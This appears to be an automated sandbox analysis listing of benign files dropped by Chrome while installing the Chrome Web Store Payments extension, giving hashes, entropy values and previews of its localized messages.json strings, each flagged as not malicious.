                                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\bg\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):796
                                                                                                                                                                Entropy (8bit):4.864931792423268
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJMLkSlwZGGMLkSlwZ+WYpU34f145Gb+dgoxTyO8ZpU34f1L0frhmJ03OyZnLt:1HE7n4gn8WYpYrbhz8ZpotHOGAOf6aD
                                                                                                                                                                MD5:6F8E288A9AD5B1ED8633B430E2B4D4CA
                                                                                                                                                                SHA1:F671D3D4BEFA431D1946D706F4192D44E29B6F08
                                                                                                                                                                SHA-256:A114E2783D0E9B12155017323BA70838F0F82A71C7EE8DC1F115AE36991241F8
                                                                                                                                                                SHA-512:0F87F3F0D115B872288949E59ACD3CD41B1FBC64A622D8FDA6D71FAFC5A900D92ADFBB0E7EB926F2A8759BBAA0896D48728FB719BBF5EF54AC21027328F7700C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ . ... ........ .. Chrome".. },.. "app_name": {.. "message": "........ . ... ........ .. Chrome".. },.. "craw_app_unavailable": {.. "message": "........... .... ...... .. .............".. },.. "craw_connect_to_network": {.. "message": "...., ........ .. . ......".. },.. "iap_unavailable": {.. "message": "........... .... ...... .. .......... ....... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "...., ...... . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ca\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):675
                                                                                                                                                                Entropy (8bit):4.536753193530313
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ0gbbGG0gbb+WYpU34g3YbiLO+dgyGFoO8ZpU34+puiPmb03OyZnLAOfTYABk:1HE5baib6WYpm31Lt0Z8Zp8pxOGAOfKD
                                                                                                                                                                MD5:1FDAFC926391BD580B655FBAF46ED260
                                                                                                                                                                SHA1:C95743C3F43B2B099FEBEBC5BD850F0C20E820AC
                                                                                                                                                                SHA-256:C67898B67F9C9209EAFDA6532B62D5789863CFB855998DD6A70E7775316CEC20
                                                                                                                                                                SHA-512:39D95D45C5746DA3BAA7AE6A3344EA17D7A7C3569C2A56959FF119261DA08C747A320FCF701AC72B8DBDBF8BF06FD8B239017A282CDDA444F3826D4EC672CBB4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagaments de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Ara mateix aquesta aplicaci. no est. disponible.".. },.. "craw_connect_to_network": {.. "message": "Connecteu-vos a una xarxa.".. },.. "iap_unavailable": {.. "message": "La funci. Pagaments a l'aplicaci. no est. disponible actualment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicieu la sessi. a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\cs\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):641
                                                                                                                                                                Entropy (8bit):4.698608127109193
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikace v sou.asn. dob. nen. dostupn..".. },.. "craw_connect_to_network": {.. "message": "P.ipojte se pros.m k s.ti.".. },.. "iap_unavailable": {.. "message": "Platby v aplikaci aktu.ln. nejsou k dispozici.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "P.ihlaste se do Chromu.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\da\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):624
                                                                                                                                                                Entropy (8bit):4.5289746475384565
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalinger i Chrome Webshop".. },.. "app_name": {.. "message": "Betalinger i Chrome Webshop".. },.. "craw_app_unavailable": {.. "message": "Appen er ikke tilg.ngelig i .jeblikket.".. },.. "craw_connect_to_network": {.. "message": "Opret forbindelse til et netv.rk.".. },.. "iap_unavailable": {.. "message": "Betaling i appen er ikke tilg.ngelig i .jeblikket.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Log ind p. Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\de\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):651
                                                                                                                                                                Entropy (8bit):4.583694000020627
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store-Zahlungen".. },.. "app_name": {.. "message": "Chrome Web Store-Zahlungen".. },.. "craw_app_unavailable": {.. "message": "Die App ist momentan nicht verf.gbar.".. },.. "craw_connect_to_network": {.. "message": "Bitte stellen Sie eine Verbindung zu einem Netzwerk her.".. },.. "iap_unavailable": {.. "message": "In-App-Zahlungen sind momentan nicht m.glich.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Bitte melden Sie sich in Chrome an.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\el\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):787
                                                                                                                                                                Entropy (8bit):4.973349962793468
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "........ ... Chrome Web Store".. },.. "app_name": {.. "message": "........ ... Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": ". ........ .... .. ..... ... ..... ..........".. },.. "craw_connect_to_network": {.. "message": ".......... .. ... .......".. },.. "iap_unavailable": {.. "message": ".. ........ ..... ......... ... ..... ..... .. ...... ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": ".......... ... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\en\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):593
                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\en_GB\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):593
                                                                                                                                                                Entropy (8bit):4.483686991119526
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Store Payments".. },.. "app_name": {.. "message": "Chrome Web Store Payments".. },.. "craw_app_unavailable": {.. "message": "App currently unavailable.".. },.. "craw_connect_to_network": {.. "message": "Please connect to a network.".. },.. "iap_unavailable": {.. "message": "In-App Payments is currently unavailable.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Please sign into Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\es\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):661
                                                                                                                                                                Entropy (8bit):4.450938335136508
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "Los pagos en la aplicaci.n no est.n disponibles en este momento.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Inicia sesi.n en Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\es_419\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):637
                                                                                                                                                                Entropy (8bit):4.47253983486615
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "app_name": {.. "message": "Sistema de pagos de Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Esta aplicaci.n no est. disponible en este momento.".. },.. "craw_connect_to_network": {.. "message": "Con.ctate a una red.".. },.. "iap_unavailable": {.. "message": "En este momento, Pagos En-Apps no est. disponible.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accede a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\et\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):595
                                                                                                                                                                Entropy (8bit):4.467205425399467
                                                                                                                                                                Encrypted:false
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome'i veebipoe maksed".. },.. "app_name": {.. "message": "Chrome'i veebipoe maksed".. },.. "craw_app_unavailable": {.. "message": "Rakendus pole praegu saadaval.".. },.. "craw_connect_to_network": {.. "message": "Looge .hendus v.rguga.".. },.. "iap_unavailable": {.. "message": "Rakendusesisesed maksed ei ole praegu saadaval.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logige Chrome'i sisse.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):647
                                                                                                                                                                Entropy (8bit):4.595421267152647
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJRuzGGRuz+WYpU34ujSBu+dgYO8ZpU34J+Bu03OyZnLAOfTY5HN:1HEFcWYpPNa8ZpD+FOGAOfEHN
                                                                                                                                                                MD5:3A01FEE829445C482D1721FF63153D16
                                                                                                                                                                SHA1:F3EAAADDC03F943FC88B30B67F534AA13E3336DD
                                                                                                                                                                SHA-256:0BDE54B20845124113383B6EB81E43A0F05E4EB0C44BEE3C1DFAC4CC5FEC2836
                                                                                                                                                                SHA-512:3B92B6C86D30FD36AA3CEFF8773BA60C3FC5CC19C693540137044C5838A5503895C770C0336A4D0A3DB5E42F3FB36274D8D3F85B9DCA2F3EC0E974FDDB0BEAD8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Storen maksut".. },.. "app_name": {.. "message": "Chrome Web Storen maksut".. },.. "craw_app_unavailable": {.. "message": "Sovellus ei ole t.ll. hetkell. k.ytett.viss..".. },.. "craw_connect_to_network": {.. "message": "Muodosta verkkoyhteys.".. },.. "iap_unavailable": {.. "message": "Sovelluksen sis.iset maksut eiv.t ole t.ll. hetkell. k.ytett.viss..".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Kirjaudu sis..n Chromeen.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fil\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):658
                                                                                                                                                                Entropy (8bit):4.5231229502550745
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJADlbGGADlb+WYpU34hTUT+dgHfZAFFZO8ZpU34hTjzeT03OyZnLAOfTYHfvF:1HEYah6WYp7TUSoxOS8Zp7TOsOGAOfqV
                                                                                                                                                                MD5:57AF5B654270A945BDA8053A83353A06
                                                                                                                                                                SHA1:EEEF7A4F869F97CF471A05D345E74F982D15E167
                                                                                                                                                                SHA-256:EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
                                                                                                                                                                SHA-512:5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\fr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):677
                                                                                                                                                                Entropy (8bit):4.552569602149629
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJALf/nbGGALf/nb+WYpU34Owdgbyb+dgdQjO8ZpU34ITQpGnbyb03OyZnLAO8:1HE4Hna1Hn6WYpNdgpY8ZpSTQwnBOGAh
                                                                                                                                                                MD5:8D11C90F44A6585B57B933AB38D1FFF8
                                                                                                                                                                SHA1:3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
                                                                                                                                                                SHA-256:599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
                                                                                                                                                                SHA-512:D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):835
                                                                                                                                                                Entropy (8bit):4.791154467711985
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEs07J0JWYp9vnCSVLP8Zp6CsOGAOf8SLm:Wh7qgYp1CMLUph1GiSLm
                                                                                                                                                                MD5:E376D757C8FD66AC70A7D2D49760B94E
                                                                                                                                                                SHA1:1525C5B1312D409604F097768503298EC440CC4D
                                                                                                                                                                SHA-256:8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
                                                                                                                                                                SHA-512:673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):618
                                                                                                                                                                Entropy (8bit):4.56999230891419
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJGiimxmbZGGGiimxmbZ+WYpU34OBOEuhopIO+dgcapZO8ZpU34GiiZrMrQphK:1HE4H4TH8WYpNjTta28ZpQVLP0SOGAOK
                                                                                                                                                                MD5:8185D0490C86363602A137F9A261CC50
                                                                                                                                                                SHA1:5BD933B874441CEACB9201CCC941FF67BAED6DC0
                                                                                                                                                                SHA-256:A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
                                                                                                                                                                SHA-512:D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\hu\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):683
                                                                                                                                                                Entropy (8bit):4.675370843321512
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJVJiGGVJi+WYpU34Hpo9O+dgMmfgijO8ZpU34Huo9O03OyZnLAOfTYBIAYm:1HEVrk5WYpQzTUg/8ZpwoXOGAOfYIAd
                                                                                                                                                                MD5:85609CF8623582A8376C206556ED2131
                                                                                                                                                                SHA1:1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
                                                                                                                                                                SHA-256:32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
                                                                                                                                                                SHA-512:27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\id\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):604
                                                                                                                                                                Entropy (8bit):4.465685261172395
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJs25bGGs25b+WYpU34ORBHAeSJ+dgkmO8ZpU34s22C/SzFAs03OyZnLAOfTYR:1HEBaA6WYpaHFH8ZptOYOGAOf2D
                                                                                                                                                                MD5:EAB2B946D1232AB98137E760954003AA
                                                                                                                                                                SHA1:60BDC2937905B311D2C9844DF2D639D7AC9F7F67
                                                                                                                                                                SHA-256:C6E8800450602DE0F39FE9F6854472383813FB454B08ABAE7E25A9167CE004C3
                                                                                                                                                                SHA-512:970FEC9A9EF0BAF7F693C4C5977F3B47914579C5B5414FCE9DBB5E4574659A5BB9AD2DE0CC886B368F49C019785AF7D2D7FE82F71341F039EADC399ED776CA12
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pembayaran Chrome Webstore".. },.. "app_name": {.. "message": "Pembayaran Chrome Webstore".. },.. "craw_app_unavailable": {.. "message": "Aplikasi tidak tersedia saat ini.".. },.. "craw_connect_to_network": {.. "message": "Sambungkan ke jaringan.".. },.. "iap_unavailable": {.. "message": "Pembayaran Dalam Aplikasi saat ini tidak tersedia.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Harap masuk ke Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\it\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):603
                                                                                                                                                                Entropy (8bit):4.479418964635223
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJsqd/bGGsqd/b+WYpU34OcX4+dgUvIO8ZpU34vq703OyZnLAOfTYsD:1HEXd/aKd/6WYpZrv58ZpskOGAOfzD
                                                                                                                                                                MD5:A328EEF5E841E0C72D3CD7366899C5C8
                                                                                                                                                                SHA1:2851ED658385804E87911643F5A4200B1FB26E13
                                                                                                                                                                SHA-256:CD891C45F7586FB4A2514205A11F260E4A6D4482FA03D901909DD9F57BE0536D
                                                                                                                                                                SHA-512:E47297896E981774EC3B59D41B89D6BA9333F6B4435EB9727D8645A46B10C7D408ADE06844871FA757382FBE7E645276449DB7B1B23BC59C9A71A5CB5A5ECC57
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pagamenti Chrome Web Store".. },.. "app_name": {.. "message": "Pagamenti Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "App al momento non disponibile.".. },.. "craw_connect_to_network": {.. "message": "Collegati a una rete.".. },.. "iap_unavailable": {.. "message": "La funzione Pagamenti In-App non . al momento disponibile.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Accedi a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ja\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):697
                                                                                                                                                                Entropy (8bit):5.20469020877498
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ07uGG07u+WYpU34DB+dgnsVztO8ZpU34MwiB03OyZnLAOfTYmSH:1HEcnDNWYp1kxU8Zp2wiqOGAOfpSH
                                                                                                                                                                MD5:9B3A5D473C3F2BBFAEECE94A07A940B8
                                                                                                                                                                SHA1:61BACA342CF766BBA15C7B4D892A0E7DAC9405AA
                                                                                                                                                                SHA-256:706312A4A2AEF3317223F141EB2B82685345B7EED444F16BB4DF3A272716DA1F
                                                                                                                                                                SHA-512:94F6FEE9A11BD890AB8211C98D1CC142348961EBCF756F66477A3E3A76519804B70BE0AE4E551739F8AFE32D7ADE6EDE04EF6B9B9EED03E3A857E6058EEDD4C6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ........".. },.. "app_name": {.. "message": "Chrome ........".. },.. "craw_app_unavailable": {.. "message": ".................".. },.. "craw_connect_to_network": {.. "message": "................".. },.. "iap_unavailable": {.. "message": ".......................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Chrome ............".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\ko\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):631
                                                                                                                                                                Entropy (8bit):5.160315577642469
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ1GG1+WYpU34K3aT+dgh8d0HTO8ZpU34KaNkaT03OyZnLAOfTY/YeHx:1HEajWYpc3aSl0Hq8Zpc6kasOGAOfyYA
                                                                                                                                                                MD5:9F6B4D82A70C74CA751E2EAE70FAB5CF
                                                                                                                                                                SHA1:0534F125FFCE8222277CF2BE3401C59DAF9217F8
